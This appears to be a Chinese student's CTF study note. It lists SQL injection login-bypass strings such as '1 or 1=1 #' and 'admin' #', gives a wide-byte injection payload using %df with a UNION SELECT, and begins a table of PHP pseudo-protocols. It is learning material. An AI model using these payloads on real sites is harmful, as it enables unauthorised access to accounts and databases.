万能密码
首先是万能密码,因为在解一道题的时候一直解不出来,后来问了才知道是用万能密码,对于这方面的掌握还不够所以来补充。
#数值型的万能密码
1 or true #
1 or 1 #
1 or 1=1 #
1 or true -- a
1 or 1 -- a
1 or 1=1 -- a
admin' #
admin' -- a
#一般#用于输入框注入,而--+用于url的注入
#如果是字符型就加上'或者"
宽字节注入
在学校比赛的时候碰到了一题,一直sql注不出来,后来知道是宽字节注入,去了解之后就觉得一眼就能看出来为什么是宽字节注入,如果输入框或者题目提示有可以输入中文或者汉字的时候就可以。
宽字节注入的原理:如果一个字符占一个字节就是窄字节,但是如果占了两个字节就是宽字节,原理就是在连接mysql的时候用的编码不一样,简单来说就是这样,但是如果要更具体请去看网上的大佬们。
1%df\' union select 1,char(97,100,109,105,110),database()
这就是宽字节注入的payload,重点在前面的%df\上面,而后面的char(97,100,109,105,110)是如果这个位置的回显位有判断只能回显存在用户的化,就要用admin绕过,翻译过来就是admin。
PHP伪协议
php支持的伪协议
伪协议 | 功能 |
---|---|
file:// | 访问本地文件系统(localhost可以是web服务器的根目录) |
zip:// | 压缩流 |
php:// | 访问各个输入输出流 |